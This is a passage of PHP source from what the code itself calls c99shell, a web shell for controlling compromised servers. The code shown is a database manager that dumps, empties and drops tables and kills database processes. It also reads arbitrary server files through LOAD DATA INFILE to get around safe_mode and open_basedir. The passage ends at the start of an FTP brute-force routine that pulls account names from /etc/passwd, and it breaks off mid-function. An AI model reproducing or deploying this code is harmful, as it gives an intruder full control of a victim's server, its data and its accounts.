  1500. elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1501. elseif ($sql_tbl_act == "insert")
  1502. {
  1503. if ($sql_tbl_insert_radio == 1)
  1504. {
  1505. $keys = "";
  1506. $akeys = array_keys($sql_tbl_insert);
  1507. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1508. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1509. $values = "";
  1510. $i = 0;
  1511. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1512. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1513. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1514. $sql_act = "query";
  1515. $sql_tbl_act = "browse";
  1516. }
  1517. elseif ($sql_tbl_insert_radio == 2)
  1518. {
  1519. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1520. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1521. $result = mysql_query($sql_query) or print(mysql_smarterror());
  1522. $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1523. $sql_act = "query";
  1524. $sql_tbl_act = "browse";
  1525. }
  1526. }
  1527. if ($sql_act == "query")
  1528. {
  1529. echo "<hr size=\"1\" noshade>";
  1530. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1531. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1532. if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1533. }
  1534. if (in_array($sql_act,$acts))
  1535. {
  1536. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1537. if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1538. if ($sql_act == "newtbl")
  1539. {
  1540. echo "<b>";
  1541. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1542. }
  1543. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1544. }
  1545. elseif ($sql_act == "dump")
  1546. {
  1547. if (empty($submit))
  1548. {
  1549. $diplay = FALSE;
  1550. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1551. echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1552. $v = join (";",$dmptbls);
  1553. echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1554. if ($dump_file) {$tmp = $dump_file;}
  1555. else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1556. echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1557. echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1558. echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1559. echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1560. echo "</form>";
  1561. }
  1562. else
  1563. {
  1564. $diplay = TRUE;
  1565. $set = array();
  1566. $set["sock"] = $sql_sock;
  1567. $set["db"] = $sql_db;
  1568. $dump_out = "download";
  1569. $set["print"] = 0;
  1570. $set["nl2br"] = 0;
  1571. $set[""] = 0;
  1572. $set["file"] = $dump_file;
  1573. $set["add_drop"] = TRUE;
  1574. $set["onlytabs"] = array();
  1575. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1576. $ret = mysql_dump($set);
  1577. if ($sql_dump_download)
  1578. {
  1579. @ob_clean();
  1580. header("Content-type: application/octet-stream");
  1581. header("Content-length: ".strlen($ret));
  1582. header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1583. echo $ret;
  1584. exit;
  1585. }
  1586. elseif ($sql_dump_savetofile)
  1587. {
  1588. $fp = fopen($sql_dump_file,"w");
  1589. if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1590. else
  1591. {
  1592. fwrite($fp,$ret);
  1593. fclose($fp);
  1594. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1595. }
  1596. }
  1597. else {echo "<b>Dump: nothing to do!</b>";}
  1598. }
  1599. }
  1600. if ($diplay)
  1601. {
  1602. if (!empty($sql_tbl))
  1603. {
  1604. if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1605. $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1606. $count_row = mysql_fetch_array($count);
  1607. mysql_free_result($count);
  1608. $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1609. $tbl_struct_fields = array();
  1610. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1611. if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1612. if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1613. if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1614. if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1615. $perpage = $sql_tbl_le - $sql_tbl_ls;
  1616. if (!is_numeric($perpage)) {$perpage = 10;}
  1617. $numpages = $count_row[0]/$perpage;
  1618. $e = explode(" ",$sql_order);
  1619. if (count($e) == 2)
  1620. {
  1621. if ($e[0] == "d") {$asc_desc = "DESC";}
  1622. else {$asc_desc = "ASC";}
  1623. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1624. }
  1625. else {$v = "";}
  1626. $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1627. $result = mysql_query($query) or print(mysql_smarterror());
  1628. echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1629. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1630. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1631. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1632. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1633. if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1634. if ($sql_tbl_act == "insert")
  1635. {
  1636. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1637. if (!empty($sql_tbl_insert_radio))
  1638. {
  1639.  
  1640. }
  1641. else
  1642. {
  1643. echo "<br><br><b>Inserting row into table:</b><br>";
  1644. if (!empty($sql_tbl_insert_q))
  1645. {
  1646. $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1647. $sql_query .= " WHERE".$sql_tbl_insert_q;
  1648. $sql_query .= " LIMIT 1;";
  1649. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1650. $values = mysql_fetch_assoc($result);
  1651. mysql_free_result($result);
  1652. }
  1653. else {$values = array();}
  1654. echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1655. foreach ($tbl_struct_fields as $field)
  1656. {
  1657. $name = $field["Field"];
  1658. if (empty($sql_tbl_insert_q)) {$v = "";}
  1659. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1660. $i++;
  1661. }
  1662. echo "</table><br>";
  1663. echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1664. if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1665. echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1666. }
  1667. }
  1668. if ($sql_tbl_act == "browse")
  1669. {
  1670. $sql_tbl_ls = abs($sql_tbl_ls);
  1671. $sql_tbl_le = abs($sql_tbl_le);
  1672. echo "<hr size=\"1\" noshade>";
  1673. echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1674. $b = 0;
  1675. for($i=0;$i<$numpages;$i++)
  1676. {
  1677. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1678. echo $i;
  1679. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1680. if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1681. else {echo "&nbsp;";}
  1682. }
  1683. if ($i == 0) {echo "empty";}
  1684. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1685. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
  1686. echo "<tr>";
  1687. echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1688. for ($i=0;$i<mysql_num_fields($result);$i++)
  1689. {
  1690. $v = mysql_field_name($result,$i);
  1691. if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1692. else {$s = "a"; $m = "desc";}
  1693. echo "<td>";
  1694. if (empty($e[0])) {$e[0] = "a";}
  1695. if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1696. else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1697. echo "</td>";
  1698. }
  1699. echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1700. echo "</tr>";
  1701. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1702. {
  1703. echo "<tr>";
  1704. $w = "";
  1705. $i = 0;
  1706. foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1707. if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1708. echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1709. $i = 0;
  1710. foreach ($row as $k=>$v)
  1711. {
  1712. $v = htmlspecialchars($v);
  1713. if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1714. echo "<td>".$v."</td>";
  1715. $i++;
  1716. }
  1717. echo "<td>";
  1718. echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1719. echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1720. echo "</td>";
  1721. echo "</tr>";
  1722. }
  1723. mysql_free_result($result);
  1724. echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1725. echo "<option value=\"\">With selected:</option>";
  1726. echo "<option value=\"deleterow\">Delete</option>";
  1727. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1728. }
  1729. }
  1730. else
  1731. {
  1732. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1733. if (!$result) {echo mysql_smarterror();}
  1734. else
  1735. {
  1736. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1737. $i = 0;
  1738. $tsize = $trows = 0;
  1739. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1740. {
  1741. $tsize += $row["Data_length"];
  1742. $trows += $row["Rows"];
  1743. $size = view_size($row["Data_length"]);
  1744. echo "<tr>";
  1745. echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1746. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1747. echo "<td>".$row["Rows"]."</td>";
  1748. echo "<td>".$row["Type"]."</td>";
  1749. echo "<td>".$row["Create_time"]."</td>";
  1750. echo "<td>".$row["Update_time"]."</td>";
  1751. echo "<td>".$size."</td>";
  1752. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1753. echo "</tr>";
  1754. $i++;
  1755. }
  1756. echo "<tr bgcolor=\"000000\">";
  1757. echo "<td><center><b>+</b></center></td>";
  1758. echo "<td><center><b>".$i." table(s)</b></center></td>";
  1759. echo "<td><b>".$trows."</b></td>";
  1760. echo "<td>".$row[1]."</td>";
  1761. echo "<td>".$row[10]."</td>";
  1762. echo "<td>".$row[11]."</td>";
  1763. echo "<td><b>".view_size($tsize)."</b></td>";
  1764. echo "<td></td>";
  1765. echo "</tr>";
  1766. echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1767. echo "<option value=\"\">With selected:</option>";
  1768. echo "<option value=\"tbldrop\">Drop</option>";
  1769. echo "<option value=\"tblempty\">Empty</option>";
  1770. echo "<option value=\"tbldump\">Dump</option>";
  1771. echo "<option value=\"tblcheck\">Check table</option>";
  1772. echo "<option value=\"tbloptimize\">Optimize table</option>";
  1773. echo "<option value=\"tblrepair\">Repair table</option>";
  1774. echo "<option value=\"tblanalyze\">Analyze table</option>";
  1775. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1776. mysql_free_result($result);
  1777. }
  1778. }
  1779. }
  1780. }
  1781. }
  1782. else
  1783. {
  1784. $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1785. if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1786. if (!empty($sql_act))
  1787. {
  1788. echo "<hr size=\"1\" noshade>";
  1789. if ($sql_act == "newdb")
  1790. {
  1791. echo "<b>";
  1792. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1793. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1794. }
  1795. if ($sql_act == "serverstatus")
  1796. {
  1797. $result = mysql_query("SHOW STATUS", $sql_sock);
  1798. echo "<center><b>Server-status variables:</b><br><br>";
  1799. echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1800. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1801. echo "</table></center>";
  1802. mysql_free_result($result);
  1803. }
  1804. if ($sql_act == "servervars")
  1805. {
  1806. $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1807. echo "<center><b>Server variables:</b><br><br>";
  1808. echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1809. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1810. echo "</table>";
  1811. mysql_free_result($result);
  1812. }
  1813. if ($sql_act == "processes")
  1814. {
  1815. if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1816. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1817. echo "<center><b>Processes:</b><br><br>";
  1818. echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1819. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1820. echo "</table>";
  1821. mysql_free_result($result);
  1822. }
  1823. if ($sql_act == "getfile")
  1824. {
  1825. $tmpdb = $sql_login."_tmpdb";
  1826. $select = mysql_select_db($tmpdb);
  1827. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1828. if ($select)
  1829. {
  1830. $created = FALSE;
  1831. mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1832. mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1833. $result = mysql_query("SELECT * FROM tmp_file;");
  1834. if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1835. else
  1836. {
  1837. for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1838. $f = "";
  1839. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1840. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1841. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1842. mysql_free_result($result);
  1843. mysql_query("DROP TABLE tmp_file;");
  1844. }
  1845. }
  1846. mysql_drop_db($tmpdb); //comment it if you want to leave database
  1847. }
  1848. }
  1849. }
  1850. }
  1851. echo "</td></tr></table>";
  1852. if ($sql_sock)
  1853. {
  1854. $affected = @mysql_affected_rows($sql_sock);
  1855. if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1856. echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  1857. }
  1858. echo "</table>";
  1859. }
  1860. if ($act == "mkdir")
  1861. {
  1862. if ($mkdir != $d)
  1863. {
  1864. if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  1865. elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  1866. echo "<br><br>";
  1867. }
  1868. $act = $dspact = "ls";
  1869. }
  1870. if ($act == "ftpquickbrute")
  1871. {
  1872. echo "<b>Ftp Quick brute:</b><br>";
  1873. if (!win) {echo "This functions not work in Windows!<br><br>";}
  1874. else
  1875. {
  1876. function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1877. {
  1878. if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
  1879. else {$TRUE = TRUE;}
  1880. if ($TRUE)
  1881. {
  1882. $sock = @ftp_connect($host,$port,$timeout);
  1883. if (@ftp_login($sock,$login,$pass))
  1884. {
  1885. echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1886. ob_flush();
  1887. return TRUE;
  1888. }
  1889. }
  1890. }
  1891. if (!empty($submit))
  1892. {
  1893. if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1894. $fp = fopen("/etc/passwd","r");
  1895. if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1896. else
  1897. {
  1898. if ($fqb_logging)
  1899. {
  1900. if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1901. else {$fqb_logfp = FALSE;}
  1902. $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
